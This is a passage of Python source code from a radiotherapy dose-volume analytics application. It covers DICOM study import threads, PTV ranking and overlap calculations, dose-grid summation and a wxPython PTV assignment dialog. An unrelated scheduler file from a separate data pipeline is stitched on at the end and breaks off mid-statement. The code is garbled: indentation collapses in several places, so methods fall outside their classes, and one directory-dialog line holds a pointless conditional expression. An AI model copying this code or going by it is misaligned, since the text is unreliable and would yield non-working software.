                    msg = (
                        "StudyImporter.run: Memory Error - "
                        "Skipping roi: %s, for mrn: %s"
                        % (roi_name_map[roi_key], mrn)
                    )
                    push_to_log(e, msg=msg)
                    dvh_row = None
                if dvh_row:
                    roi_type = dvh_row["roi_type"][0]

                    # Collect dvh, volume, and index of ptvs to be used for post-import calculations
                    if roi_type.startswith("PTV"):
                        ptvs["dvh"].append(dvh_row["dvh_string"][0])
                        ptvs["volume"].append(dvh_row["volume"][0])
                        ptvs["index"].append(len(data_to_import["DVHs"]))
                        data_to_import["DVHs"].append(dvh_row)
                    else:
                        self.push({"DVHs": [dvh_row]})

        # Sort PTVs by their D_95% (applicable to SIBs)
        if ptvs["dvh"] and not self.terminate:
            ptv_order = rank_ptvs_by_D95(ptvs)
            for ptv_row, dvh_row_index in enumerate(ptvs["index"]):
                data_to_import["DVHs"][dvh_row_index]["roi_type"][
                    0
                ] = "PTV%s" % (ptv_order[ptv_row] + 1)

        # Must push data to SQL before processing post import calculations since they rely on SQL
        if not self.terminate:
            self.push(data_to_import)

        # Wait until entire study has been pushed since these values are based on entire PTV volume,
        # unless plan_ptvs are assigned
        if (
            self.final_plan_in_study or parsed_data.plan_ptvs
        ) and not self.terminate:
            if db_update.uid_has_ptvs(study_uid):
                # collect roi names for post-import calculations
                # This block moved here since patient's with multiple plans use multiple threads, calculate this
                # on import of final plan import
                post_import_rois = []
                roi_name_map = {
                    key: structures[key]["name"]
                    for key in list(structures)
                    if structures[key]["type"] != "MARKER"
                }
                for roi_counter, roi_key in enumerate(list(roi_name_map)):
                    roi_name = clean_name(roi_name_map[roi_key])
                    with DVH_SQL() as cnx:
                        condition = (
                            "roi_name = '%s' and study_instance_uid = '%s'"
                            % (roi_name, study_uid)
                        )
                        query_return = cnx.query(
                            "DVHs", "roi_type, physician_roi", condition
                        )
                    if query_return:
                        roi_type, physician_roi = tuple(query_return[0])
                        included_types = ["organ", "ctv", "gtv", "none", ""]
                        # exclude external/skin/body and unmapped ROIs from
                        # PTV distance/overlap calculations
                        if str(roi_type).lower() in included_types:
                            if not (
                                str(physician_roi).lower()
                                in [
                                    "uncategorized",
                                    "ignored",
                                    "external",
                                    "skin",
                                    "body",
                                ]
                                or roi_name.lower()
                                in ["external", "skin", "body"]
                            ):
                                post_import_rois.append(
                                    clean_name(roi_name_map[roi_key])
                                )

                # Calculate the PTV overlap for each roi
                tv = db_update.get_total_treatment_volume_of_study(
                    study_uid, ptvs=parsed_data.plan_ptvs
                )
                self.post_import_calc(
                    "PTV Overlap Volume",
                    study_uid,
                    post_import_rois,
                    db_update.treatment_volume_overlap,
                    tv,
                )

                # Calculate the centroid distances of roi-to-PTV for each roi
                tv_centroid = db_update.get_treatment_volume_centroid(tv)
                self.post_import_calc(
                    "Centroid Distance to PTV",
                    study_uid,
                    post_import_rois,
                    db_update.dist_to_ptv_centroids,
                    tv_centroid,
                )

                # Calculate minimum, mean, median, and max distances and DTH
                # tv_coord = db_update.get_treatment_volume_coord(tv)
                # tv_coord = sample_roi(tv_coord)
                self.post_import_calc(
                    "Distances to PTV",
                    study_uid,
                    post_import_rois,
                    db_update.min_distances,
                    tv,
                )

                # Calculate OVH
                self.post_import_calc(
                    "Overlap Volume Histogram (OVH)",
                    study_uid,
                    post_import_rois,
                    db_update.ovh,
                    tv,
                )

                self.update_ptv_data_in_db(tv, study_uid)
            else:
                msg = (
                    "StudyImporter.run: Skipping PTV related calculations. "
                    "No PTV found for mrn: %s" % mrn
                )
                push_to_log(msg=msg)

        if self.terminate:
            self.delete_partially_updated_plan()
        else:
            # queue this plan's files for moving; moving happens once the
            # study's final plan signals completion
            pub.sendMessage("dicom_import_move_files_queue", msg=move_msg)
            if self.final_plan_in_study:
                pub.sendMessage("dicom_import_move_files")

    @staticmethod
    def push(data_to_import):
        """
        Push data to the SQL database
        :param data_to_import: data to import, should be formatted as
        indicated in db.sql_connector.DVH_SQL.insert_row
        :type data_to_import: dict
        """
        with DVH_SQL() as cnx:
            cnx.insert_data_set(data_to_import)

    def post_import_calc(self, title, uid, rois, func, pre_calc):
        """
        Generic function to perform a post-import calculation
        :param title: title to be displayed in progress dialog
        :type title: str
        :param uid: the plan uid to be displayed in the progress dialog
        :type uid: str
        :param rois: the roi_names to be processed
        :type rois: list
        :param func: the function from db.update called to process the data
        :param pre_calc: data related to total treatment volume for the specific func passed
        """
        if not self.terminate:
            roi_total = len(rois)
            for roi_counter, roi_name in enumerate(rois):
                msg = {
                    "calculation": title,
                    "roi_num": roi_counter + 1,
                    "roi_total": roi_total,
                    "roi_name": roi_name,
                    "progress": int(100 * roi_counter / roi_total),
                }
                wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)
                func(uid, roi_name, pre_calc=pre_calc)

    def update_ptv_data_in_db(self, tv, study_uid):
        """Store total-treatment-volume statistics for the study in SQL."""
        if not self.terminate:
            # Update progress dialog
            msg = {
                "calculation": "Total Treatment Volume Statistics",
                "roi_num": 0,
                "roi_total": 1,
                "roi_name": "PTV",
                "progress": 0,
            }
            wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)

            # Update PTV geometric data
            db_update.update_ptv_data(tv, study_uid)

            # Update progress dialog
            msg["roi_num"], msg["progress"] = 1, 100
            wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)

    def delete_partially_updated_plan(self):
        """
        If import process fails, call this function to remove the partially imported data into SQL
        """
        with DVH_SQL() as cnx:
            if cnx.db_type == "sqlite":
                cnx.delete_rows(
                    "DATETIME(import_time_stamp) > DATETIME('%s')"
                    % self.last_import_time
                )
            else:
                cnx.delete_rows(
                    "import_time_stamp > '%s'::date" % self.last_import_time
                )

    def set_terminate(self):
        # pubsub callback: stop work at the next checkpoint
        self.terminate = True
class ImportWorker(Thread):
"""
Create a thread separate from the GUI to perform the import calculations
"""
    def __init__(
        self,
        data,
        checked_uids,
        import_uncategorized,
        other_dicom_files,
        start_path,
        keep_in_inbox,
        roi_map,
        use_dicom_dvh,
        auto_sum_dose,
        copy_misc_files,
    ):
        """
        :param data: parsed dicom data
        :type data: dict
        :param checked_uids: uids that were selected in the GUI for import
        :type checked_uids: list
        :param import_uncategorized: if True, import rois with names that that are not mapped
        :type import_uncategorized: bool
        :param other_dicom_files: other dicom files found in the import directory
        :type other_dicom_files: dict
        :param start_path: root of the import inbox, cleaned of empty folders on close
        :param keep_in_inbox: Set to False to move files, True to copy files to imported
        :type keep_in_inbox: bool
        :param roi_map: pass the latest roi_map
        :param use_dicom_dvh: if DVH exists in DICOM RT-Dose, import it instead of calculating
        :type use_dicom_dvh: bool
        :param auto_sum_dose:
        :type auto_sum_dose: bool
        :param copy_misc_files:
        :type copy_misc_files: bool
        """
        Thread.__init__(self)

        self.delete_dose_sum_files()  # do this before starting the thread to avoid crash

        self.data = data
        self.checked_uids = checked_uids
        self.import_uncategorized = import_uncategorized
        self.other_dicom_files = other_dicom_files
        self.start_path = start_path
        self.keep_in_inbox = keep_in_inbox
        self.roi_map = roi_map
        self.use_dicom_dvh = use_dicom_dvh
        self.auto_sum_dose = auto_sum_dose
        self.copy_misc_files = copy_misc_files

        self.dose_sum_save_file_names = self.get_dose_sum_save_file_names()

        # file-move messages queued until the study's final plan completes
        self.move_msg_queue = []

        self.terminate = False
        self.__do_subscribe()

        self.start()  # start the thread
def __do_subscribe(self):
pub.subscribe(self.move_files, "dicom_import_move_files")
pub.subscribe(
self.track_move_files_msg, "dicom_import_move_files_queue"
)
pub.subscribe(self.set_terminate, "terminate_import")
    def run(self):
        """Thread entry point: optionally sum dose grids, then run the import.

        Each stage's failures are logged rather than propagated so the
        dialog is always closed via close().
        """
        try:
            if self.auto_sum_dose:
                msg = {
                    "calculation": "Dose Grid Summation(s)... please wait",
                    "roi_num": 0,
                    "roi_total": 1,
                    "roi_name": "",
                    "progress": 0,
                }
                wx.CallAfter(pub.sendMessage, "update_calculation", msg=msg)
                self.run_dose_sum()
        except Exception as e:
            msg = "ERROR: Dose summation failed"
            push_to_log(e, msg=msg)

        try:
            self.run_import()
            if not self.terminate:
                wx.CallAfter(pub.sendMessage, "backup_sqlite_db")
        except Exception as e:
            msg = "ERROR: Import failed"
            push_to_log(e, msg=msg)
        self.close()
    def close(self):
        """Remove temp dose-sum files, tidy the inbox, and signal the status
        dialog to close."""
        self.delete_dose_sum_files()
        remove_empty_sub_folders(self.start_path)
        pub.sendMessage("close")
def run_dose_sum(self):
"""Could not implement with threading due to memory allocation issues"""
pool = Pool(processes=1)
pool.starmap(self.sum_two_doses, self.dose_sum_args)
pool.close()
def run_import(self):
queue = self.import_queue
worker = Thread(target=self.import_target, args=[queue])
worker.setDaemon(True)
worker.start()
queue.join()
def import_target(self, queue):
while queue.qsize():
parameters = queue.get()
if not self.terminate:
StudyImporter(*parameters)
queue.task_done()
def get_dose_file_sets(self):
study_uids = get_study_uid_dict(self.checked_uids, self.data)
dose_file_sets = {}
for study_uid, plan_uid_set in study_uids.items():
if len(plan_uid_set) > 1:
dose_file_sets[study_uid] = [
self.data[plan_uid].dose_file for plan_uid in plan_uid_set
]
return dose_file_sets
    @property
    def import_queue(self):
        """Build a Queue of StudyImporter argument tuples for checked plans.

        Plans missing from ``self.data`` are logged and skipped. With auto
        dose summation, a study's plans share one summed dose file;
        otherwise each plan of a multi-plan study gets a suffixed study UID.
        """
        study_uids = get_study_uid_dict(self.checked_uids, self.data)
        plan_total = len(self.checked_uids)
        plan_counter = 0
        queue = Queue()
        for study_uid, plan_uid_set in study_uids.items():
            plan_count = len(plan_uid_set)
            for i, plan_uid in enumerate(plan_uid_set):
                if plan_uid in list(self.data):
                    msg = {
                        "patient_name": self.data[plan_uid].patient_name,
                        "uid": self.data[
                            plan_uid
                        ].study_instance_uid_to_be_imported,
                        "progress": int(100 * plan_counter / plan_total),
                        "study_number": plan_counter + 1,
                        "study_total": plan_total,
                    }
                    init_param = self.data[plan_uid].init_param
                    init_param["roi_map"] = self.roi_map
                    init_param["use_dicom_dvh"] = self.use_dicom_dvh
                    if self.auto_sum_dose:
                        if study_uid in self.dose_sum_save_file_names.keys():
                            init_param[
                                "dose_sum_file"
                            ] = self.dose_sum_save_file_names[study_uid]
                    elif plan_count > 1:
                        # no summation: disambiguate plans sharing a study
                        # UID with an _N suffix
                        init_param["plan_over_rides"][
                            "study_instance_uid"
                        ] = "%s_%s" % (study_uid, i + 1)
                    # with summed dose, only the study's last plan triggers
                    # composite PTV calculations
                    final_plan = (
                        True
                        if not self.auto_sum_dose
                        else plan_uid == plan_uid_set[-1]
                    )

                    args = (
                        init_param,
                        msg,
                        self.import_uncategorized,
                        final_plan,
                    )
                    queue.put(args)
                else:
                    msg = (
                        "ImportWorker.import_queue: This plan could not be parsed. Skipping import. "
                        "Did you supply RT Structure, Dose, and Plan?\n\tPlan UID: %s\n\tMRN: %s"
                        % (plan_uid, self.data[plan_uid].mrn)
                    )
                    push_to_log(msg=msg)
                plan_counter += 1
        return queue
def move_files(self):
    """Move (or copy) the files for every queued message, then clear the queue.

    Each message supplies the file list, destination MRN directory, and
    UID; miscellaneous DICOM files for the same UID are appended when
    ``copy_misc_files`` is enabled.
    """
    for entry in self.move_msg_queue:
        file_paths = entry["files"]
        uid = entry["uid"]
        if self.copy_misc_files and uid in self.other_dicom_files.keys():
            file_paths.extend(self.other_dicom_files[uid])
        destination = join(entry["import_path"], entry["mrn"])
        move_files_to_new_path(
            file_paths,
            destination,
            copy_files=self.keep_in_inbox,
            callback=self.update_copy_status,
        )
    self.move_msg_queue = []  # all messages handled; reset the queue
@staticmethod
def update_copy_status(i, file_count):
    """Publish a GUI progress update while files are being copied.

    :param i: zero-based index of the file just processed
    :param file_count: total number of files being copied
    """
    pct = (float(i) / file_count) * 100
    payload = {
        "calculation": "Copying file %s of %s" % (i + 1, file_count),
        "roi_num": i,
        "roi_total": file_count,
        "roi_name": "",
        "progress": pct,
    }
    # Marshal the pubsub call onto the wx main thread
    wx.CallAfter(pub.sendMessage, "update_calculation", msg=payload)
def track_move_files_msg(self, msg):
    # Buffer the incoming "move files" message until move_files() runs.
    self.move_msg_queue.append(msg)
def set_terminate(self):
    # Flag checked by import_target() to skip any remaining imports.
    self.terminate = True
@property
def dose_sum_args(self):
    """Argument tuples for ``sum_two_doses``, grouped per study.

    For each study, the first two dose files initialize the study's sum
    file; every additional dose file accumulates into that same file.
    """
    args_list = []
    save_names = self.dose_sum_save_file_names
    for uid, dose_files in self.get_dose_file_sets().items():
        if len(dose_files) < 2:
            continue
        target = save_names[uid]
        # First pair creates the sum file for this study
        args_list.append((dose_files[0], dose_files[1], target))
        # Remaining dose grids are added into the existing sum file
        for extra_file in dose_files[2:]:
            args_list.append((target, extra_file, target))
    return args_list
def get_dose_sum_save_file_names(self):
    """Pick a unique temp-file name per multi-plan study for its dose sum.

    Names follow the ``temp_dose_sum_<n>`` pattern and skip any that
    already exist in ``TEMP_DIR``.
    """
    dose_file_sets = self.get_dose_file_sets()
    taken = {f for f in listdir(TEMP_DIR) if "temp_dose_sum" in f}
    chosen = []
    index = 1
    while len(chosen) < len(list(dose_file_sets)):
        candidate = "temp_dose_sum_%s" % index
        index += 1
        if candidate not in taken:
            chosen.append(candidate)
    return {
        uid: join(TEMP_DIR, chosen[i])
        for i, uid in enumerate(list(dose_file_sets))
    }
@staticmethod
def sum_two_doses(dose_file_1, dose_file_2, save_to):
    """Sum two RT Dose grids and write the result to TEMP_DIR/save_to."""
    accumulator = DoseGrid(dose_file_1)
    accumulator.add(DoseGrid(dose_file_2))
    accumulator.save_dcm(join(TEMP_DIR, save_to))
@staticmethod
def delete_dose_sum_files():
    """Remove all temporary dose-sum files from TEMP_DIR."""
    for file_name in (f for f in listdir(TEMP_DIR) if "temp_dose_sum" in f):
        remove(join(TEMP_DIR, file_name))
def get_study_uid_dict(checked_uids, parsed_dicom_data, multi_plan_only=False):
    """Group plan UIDs by the study they will be imported under.

    The import thread iterates ``checked_uids`` (plan uids), but plans on
    the same study must be imported adjacently, so group them by study
    instance uid.

    :param checked_uids: plan UIDs selected for import
    :param parsed_dicom_data: dict of plan UID -> parsed DICOM data object
    :param multi_plan_only: if True, keep only studies with 2+ plans
    :return: a dictionary with study uids for the keys and a list of
        associated plan uids for values
    :rtype: dict
    """
    study_uids = {}
    for plan_uid in checked_uids:
        study_uid = parsed_dicom_data[
            plan_uid
        ].study_instance_uid_to_be_imported
        # setdefault replaces the O(n) "key not in list(dict)" membership
        # test of the original while preserving insertion order
        study_uids.setdefault(study_uid, []).append(plan_uid)
    if multi_plan_only:
        study_uids = {
            uid: plans
            for uid, plans in study_uids.items()
            if len(plans) > 1
        }
    return study_uids
class AssignPTV(wx.Dialog):
    """Dialog to assign PTVs to the plans of multi-plan studies.

    Only StudyInstanceUIDs associated with multiple dose files are
    presented. For each plan the user moves PTV names between an
    "ignored" and an "included" list; on close the selections are
    written back to ``parsed_dicom_data[plan_uid].plan_ptvs``.
    """

    def __init__(self, parent, parsed_dicom_data, study_uid_dict):
        wx.Dialog.__init__(self, parent)
        self.continue_status = False  # True once the dialog completes normally
        self.parsed_dicom_data = parsed_dicom_data
        self.study_uid_dict = study_uid_dict
        self.__initialize_uid_dict()
        self.__initialize_ptv_dict()
        self.__initialize_patient_name_list()
        self.current_index = 0
        self.__set_auto_assigned()
        self.plan_uid, self.study_uid = self.uids[self.current_index]
        self.input_keys = [
            "patient_name",
            "study_instance_uid",
            "plan_uid",
            "sim_study_date",
            "tx_site",
        ]
        self.text_ctrl = {
            key: wx.TextCtrl(self, wx.ID_ANY, "") for key in self.input_keys
        }
        self.label = {
            key: wx.StaticText(
                self,
                wx.ID_ANY,
                key.replace("_", " ").title().replace("Uid", "UID") + ":",
            )
            for key in self.input_keys
        }
        self.button_add = wx.Button(self, wx.ID_ANY, ">")
        self.button_remove = wx.Button(self, wx.ID_ANY, "<")
        keys = ["ignored", "included"]
        self.list_ctrl = {
            key: wx.ListCtrl(
                self,
                wx.ID_ANY,
                style=wx.LC_HRULES | wx.LC_REPORT | wx.LC_VRULES,
            )
            for key in keys
        }
        self.data_table = {
            key: DataTable(
                self.list_ctrl[key], columns=[key.capitalize()], widths=[-2]
            )
            for key in keys
        }
        self.button_cancel = wx.Button(self, wx.ID_CANCEL, "Cancel")
        self.button_back = wx.Button(self, wx.ID_ANY, "Back")
        self.button_next = wx.Button(self, wx.ID_ANY, "Next")
        self.gauge = wx.Gauge(self, wx.ID_ANY, 100)
        self.__set_properties()
        self.__do_bind()
        self.__do_layout()
        if not len(self.allowed_indices):
            # Every plan was auto-assigned (fewer than 2 PTVs per study),
            # so there is nothing to show
            wx.CallAfter(self.close)
        else:
            self.update_data()

    def __set_properties(self):
        self.SetTitle("PTV Assignment for Overlap and Distance Calculations")
        # All text fields are display-only
        for text_ctrl in self.text_ctrl.values():
            text_ctrl.Disable()

    def __do_bind(self):
        self.Bind(wx.EVT_BUTTON, self.on_next, id=self.button_next.GetId())
        self.Bind(wx.EVT_BUTTON, self.on_back, id=self.button_back.GetId())
        self.Bind(wx.EVT_BUTTON, self.on_include, id=self.button_add.GetId())
        self.Bind(wx.EVT_BUTTON, self.on_ignore, id=self.button_remove.GetId())

    def __do_layout(self):
        # Sizers
        sizer_wrapper = wx.BoxSizer(wx.VERTICAL)
        sizer_main = wx.BoxSizer(wx.VERTICAL)
        sizer_input = wx.StaticBoxSizer(
            wx.StaticBox(self, wx.ID_ANY, ""), wx.VERTICAL
        )
        sizer_text_ctrl = {
            key: wx.BoxSizer(wx.VERTICAL) for key in self.input_keys
        }
        sizer_add_remove = wx.BoxSizer(wx.VERTICAL)
        sizer_list_ctrl = wx.BoxSizer(wx.HORIZONTAL)
        sizer_buttons = wx.BoxSizer(wx.HORIZONTAL)
        sizer_cancel = wx.BoxSizer(wx.HORIZONTAL)
        sizer_back_next = wx.BoxSizer(wx.HORIZONTAL)
        sizer_gauge = wx.BoxSizer(wx.HORIZONTAL)
        # Add text_ctrl and label objects
        for key in self.input_keys:
            sizer_text_ctrl[key].Add(self.label[key], 0, 0, 0)
            sizer_text_ctrl[key].Add(self.text_ctrl[key], 0, wx.EXPAND, 0)
            sizer_input.Add(sizer_text_ctrl[key], 0, wx.ALL | wx.EXPAND, 5)
        # PTV assignment lists with add/remove buttons between them
        sizer_list_ctrl.Add(self.list_ctrl["ignored"], 1, wx.EXPAND, 0)
        sizer_add_remove.Add((20, 20), 0, 0, 0)  # Top Spacer
        sizer_add_remove.Add(self.button_add, 0, wx.ALIGN_CENTER | wx.ALL, 5)
        sizer_add_remove.Add(
            self.button_remove, 0, wx.ALIGN_CENTER | wx.ALL, 5
        )
        sizer_add_remove.Add((20, 20), 0, 0, 0)  # Bottom Spacer
        sizer_list_ctrl.Add(sizer_add_remove, 0, wx.ALL | wx.EXPAND, 10)
        sizer_list_ctrl.Add(self.list_ctrl["included"], 1, wx.EXPAND, 0)
        sizer_input.Add(sizer_list_ctrl, 0, wx.ALL | wx.EXPAND, 5)
        # Cancel, Back, and Next buttons
        sizer_cancel.Add(self.button_cancel, 0, wx.ALL, 5)
        sizer_buttons.Add(sizer_cancel, 0, wx.EXPAND, 0)
        sizer_gauge.Add(self.gauge, 1, wx.EXPAND | wx.ALL, 5)
        sizer_buttons.Add(sizer_gauge, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 50)
        sizer_back_next.Add(self.button_back, 0, wx.ALL, 5)
        sizer_back_next.Add(self.button_next, 0, wx.ALL, 5)
        sizer_buttons.Add(sizer_back_next, 0, wx.EXPAND, 0)
        sizer_main.Add(sizer_input, 1, wx.ALL | wx.EXPAND, 5)
        sizer_main.Add(sizer_buttons, 0, wx.ALL | wx.EXPAND, 5)
        note = wx.StaticText(
            self,
            wx.ID_ANY,
            "NOTE: Only StudyInstanceUIDs associated with multiple dose files "
            "are included/needed in this PTV Assignment window.",
        )
        note.SetFont(
            wx.Font(
                11,
                wx.FONTFAMILY_DEFAULT,
                wx.FONTSTYLE_NORMAL,
                wx.FONTWEIGHT_NORMAL,
                0,
                "",
            )
        )
        sizer_main.Add(note, 0, wx.ALL, 10)
        sizer_wrapper.Add(sizer_main, 1, wx.EXPAND, 0)
        self.SetSizer(sizer_wrapper)
        self.Fit()
        self.Layout()
        self.Center()

    def __initialize_uid_dict(self):
        """Create a list of tuples (plan_uid, study_uid) for multi-plan studies"""
        self.uids = []
        self.study_uid_list = []
        self.plan_uid_lists = {}
        for study_uid, plan_uid_set in self.study_uid_dict.items():
            if len(plan_uid_set) > 1:
                if study_uid not in self.study_uid_list:
                    self.study_uid_list.append(study_uid)
                    self.plan_uid_lists[study_uid] = []
                for plan_uid in plan_uid_set:
                    self.plan_uid_lists[study_uid].append(plan_uid)
                    self.uids.append((plan_uid, study_uid))

    def __initialize_ptv_dict(self):
        """Create dict to track all PTVs in a study, and to which plans they are assigned"""
        # Keys of self.ptvs are BOTH study uids (all PTVs of the study)
        # and plan uids (PTVs currently assigned to that plan)
        self.ptvs = {}
        for plan_uid, study_uid in self.uids:
            if study_uid not in list(self.ptvs):
                self.ptvs[study_uid] = set()
            if plan_uid not in list(self.ptvs):
                self.ptvs[plan_uid] = set(
                    self.parsed_dicom_data[plan_uid].plan_ptvs
                )
            ptvs = set(
                self.parsed_dicom_data[plan_uid].stored_values["ptv_names"]
            )
            self.ptvs[study_uid] = self.ptvs[study_uid].union(ptvs)

    def __initialize_patient_name_list(self):
        # Ordered, de-duplicated patient names for the progress label
        self.patient_name_list = []
        for study_uid in self.study_uid_list:
            for plan_uid in self.plan_uid_lists[study_uid]:
                patient_name = self.parsed_dicom_data[plan_uid].patient_name
                if patient_name not in self.patient_name_list:
                    self.patient_name_list.append(patient_name)

    def update_labels(self):
        """Append "(i/n)" progress counters to the study/plan/patient labels."""
        study_index = self.study_uid_list.index(self.study_uid)
        study_length = len(self.study_uid_list)
        plan_uid_index = self.plan_uid_lists[self.study_uid].index(
            self.plan_uid
        )
        plan_length = len(self.plan_uid_lists[self.study_uid])
        pat_index = self.patient_name_list.index(
            self.text_ctrl["patient_name"].GetValue()
        )
        pat_length = len(self.patient_name_list)
        study_label_end = ": (%s/%s)" % (study_index + 1, study_length)
        new_study_label = (
            self.label["study_instance_uid"].GetLabel().split(":")[0]
            + study_label_end
        )
        self.label["study_instance_uid"].SetLabel(new_study_label)
        plan_label_end = ": (%s/%s)" % (plan_uid_index + 1, plan_length)
        new_plan_label = (
            self.label["plan_uid"].GetLabel().split(":")[0] + plan_label_end
        )
        self.label["plan_uid"].SetLabel(new_plan_label)
        pat_label_end = ": (%s/%s)" % (pat_index + 1, pat_length)
        # Patient names may contain ':'; split on the right-most colon
        right_colon_index = self.label["patient_name"].GetLabel().rfind(":")
        new_pat_label = (
            self.label["patient_name"].GetLabel()[:right_colon_index]
            + pat_label_end
        )
        self.label["patient_name"].SetLabel(new_pat_label)

    def update_data(self, increment=0):
        """Advance ``increment`` steps and refresh all displayed fields."""
        self.current_index += increment
        # BUG FIX: guard the denominator — with exactly one allowed index
        # the original divided by zero
        denominator = max(len(self.allowed_indices) - 1, 1)
        progress = 100 * float(self.current_index) / denominator
        self.gauge.SetValue(progress)
        self.update_back_next_buttons()
        if self.current_index < len(self.allowed_indices):
            i = self.allowed_indices[self.current_index]
            self.plan_uid, self.study_uid = self.uids[i]
            data = self.parsed_dicom_data[self.plan_uid]
            for key, text_ctrl in self.text_ctrl.items():
                value = (
                    getattr(data, key) if key != "plan_uid" else self.plan_uid
                )
                if key == "sim_study_date":
                    try:
                        date = parse_date(value)
                        value = "%s-%s-%s" % (date.year, date.month, date.day)
                    except Exception:
                        # Leave unparseable dates as-is
                        pass
                text_ctrl.SetValue(value)
            self.update_ptv_data_tables()
            self.update_labels()
        else:
            # Walked past the last plan: finish up
            self.close()

    def update_ptv_data_tables(self):
        """Refresh the ignored/included list controls for the current plan."""
        ptvs = self.get_current_ptv_assignments()
        for key in ["ignored", "included"]:
            column = key.capitalize()
            self.data_table[key].set_data({column: ptvs[key]}, [column])

    def get_current_ptv_assignments(self):
        """Split the study's PTVs into included/ignored for the current plan."""
        included, ignored = [], []
        for ptv in self.ptvs[self.study_uid]:
            if ptv in self.ptvs[self.plan_uid]:
                included.append(ptv)
            else:
                ignored.append(ptv)
        included.sort()
        ignored.sort()
        return {"included": included, "ignored": ignored}

    def on_next(self, *evt):
        self.update_data(1)

    def on_back(self, *evt):
        self.update_data(-1)

    def on_include(self, *evt):
        # Move the selected "ignored" PTVs into the current plan
        selected_ptvs = set(
            [row[0] for row in self.data_table["ignored"].selected_row_data]
        )
        self.ptvs[self.plan_uid] = self.ptvs[self.plan_uid].union(
            selected_ptvs
        )
        self.update_data()

    def on_ignore(self, *evt):
        # Remove the selected "included" PTVs from the current plan
        selected_ptvs = set(
            [row[0] for row in self.data_table["included"].selected_row_data]
        )
        self.ptvs[self.plan_uid] = self.ptvs[self.plan_uid].difference(
            selected_ptvs
        )
        self.update_data()

    def close(self):
        """Write the PTV assignments back to the parsed data and close."""
        for plan_uid, parsed_dicom_data in self.parsed_dicom_data.items():
            # BUG FIX: the original tested ``plan_uid in self.ptvs.values()``
            # — membership among the stored *sets* — which is always False,
            # so assignments were never written back. Test the keys instead.
            if plan_uid in self.ptvs:
                parsed_dicom_data.plan_ptvs = list(self.ptvs[plan_uid])
        self.continue_status = True
        self.Close()

    def update_back_next_buttons(self):
        self.button_back.Enable(self.current_index > 0)
        label = "Next" if self.current_index < len(self.uids) - 1 else "Finish"
        self.button_next.SetLabel(label)

    def __set_auto_assigned(self):
        # Auto skip if < 2 PTVs: a single PTV is assigned automatically,
        # zero PTVs means nothing to assign
        self.auto_assigned = []
        self.allowed_indices = []
        for i, (plan_uid, study_uid) in enumerate(self.uids):
            ptv_count = len(self.ptvs[study_uid])
            if ptv_count < 2:
                if ptv_count == 1:
                    # BUG FIX: the original read ``self.study_uid``, which is
                    # not set until after this method runs in __init__
                    # (AttributeError); use the loop-local study_uid and copy
                    # the set so plans don't alias the study's set.
                    self.ptvs[plan_uid] = set(self.ptvs[study_uid])
                self.auto_assigned.append(i)
            else:
                self.allowed_indices.append(i)
class PreprocessDicom:
    """Workflow to rewrite the StudyInstanceUID of DICOM files in a directory.

    Warns the user first, then prompts for a directory, rewrites UIDs with a
    progress frame, and finally offers to parse the directory for import.
    """

    def __init__(self, parent):
        # parent: the wx window used as parent for all dialogs
        self.parent = parent
        self.directory = None
        self.__do_subscribe()
        self.run_warning()  # will call self.run()

    def __do_subscribe(self):
        # The ProgressFrame publishes this topic when UID rewriting finishes
        pub.subscribe(
            self.build_dicom_file_tree_prompt, "build_dicom_file_tree_prompt"
        )

    def __do_unsubscribe(self):
        pub.unsubAll(topicName="build_dicom_file_tree_prompt")

    def run_warning(self):
        """Confirm with the user before editing any files."""
        caption = "WARNING\nThis will edit the StudyInstanceUID of DICOM files selected in the next window!"
        message = "This shouldn't be needed for DICOM compliant files, use with caution.\n\nAre you sure?"
        MessageDialog(self.parent, caption, message, action_yes_func=self.run)

    def run(self):
        """Prompt for a directory, then rewrite StudyInstanceUIDs with progress."""
        dlg = wx.DirDialog(
            self.parent,
            "Select a directory",
            "",
            wx.DD_DEFAULT_STYLE | wx.DD_MUST_EXIST if False else wx.DD_DEFAULT_STYLE | wx.DD_DIR_MUST_EXIST,
        )
        if dlg.ShowModal() == wx.ID_OK:
            self.directory = dlg.GetPath()
            _, obj_list = get_new_uids_by_directory(self.directory)
            # ProgressFrame publishes "build_dicom_file_tree_prompt" on close
            ProgressFrame(
                obj_list,
                edit_study_uid,
                title="Writing New StudyInstanceUIDs",
                action_msg="Processing File",
                close_msg="build_dicom_file_tree_prompt",
                kwargs=True,
            )
        dlg.Destroy()

    def build_dicom_file_tree(self):
        if self.directory is not None:
            pub.sendMessage("build_dicom_file_tree", directory=self.directory)

    def build_dicom_file_tree_prompt(self):
        """Ask whether to parse the edited directory for import."""
        caption = "Parse this directory for import?"
        MessageDialog(
            self.parent, caption, action_yes_func=self.build_dicom_file_tree
        )
        self.__do_unsubscribe()
|
scheduler.py | import logging
import multiprocessing as mp
import pandas as pd
from uuid import UUID
import emission.core.get_database as edb
import emission.net.usercache.abstract_usercache as enua
import emission.storage.timeseries.aggregate_timeseries as estag
import emission.storage.decorations.user_queries as esdu
import emission.pipeline.intake_stage as epi
def get_split_uuid_lists(n_splits, is_public_pipeline):
    """Partition user UUIDs into ``n_splits`` lists for parallel intake runs.

    Users are sorted by their usercache message count and dealt round-robin
    across the splits so each split gets a roughly similar workload.

    The count of messages in the usercache is only a scheduling *hint*:
    a zero count here is no guarantee of zero work in processing, and in
    particular no indication that there are no pending entries in the
    long-term cache. (That is why the long-term cache and usercache uuid
    lists used to be separate; that technique required coordination after
    the usercache was processed, which is incompatible with parallelizing
    the entire pipeline.) We therefore use the count as a hint and do NOT
    filter out users based on it.

    :param n_splits: number of lists to return
    :param is_public_pipeline: use test-phone UUIDs when True, all
        non-test-phone UUIDs otherwise
    :return: list of ``n_splits`` lists of user UUIDs
    """
    def get_count(u):
        # Usercache message count; used only as a scheduling hint (see above)
        return enua.UserCache.getUserCache(u).getMessageCount()

    if is_public_pipeline:
        sel_uuids = esdu.get_test_phone_uuids()
    else:
        sel_uuids = esdu.get_non_test_phone_uuids()
    sel_jobs = [(u, get_count(u)) for u in sel_uuids]
    # non_zero_jobs = [j for j in sel_jobs if j[1] != 0]
    # Not filtering for now (see docstring)
    non_zero_jobs = sel_jobs
    logging.debug("sel_uuids = %s, sel_jobs = %s, non_zero_jobs = %s" %
                  (len(sel_uuids), len(sel_jobs), len(non_zero_jobs)))
    # BUG FIX: DataFrame.sort() was removed in pandas 0.20;
    # sort_values() is the supported replacement.
    non_zero_jobs_df = pd.DataFrame(
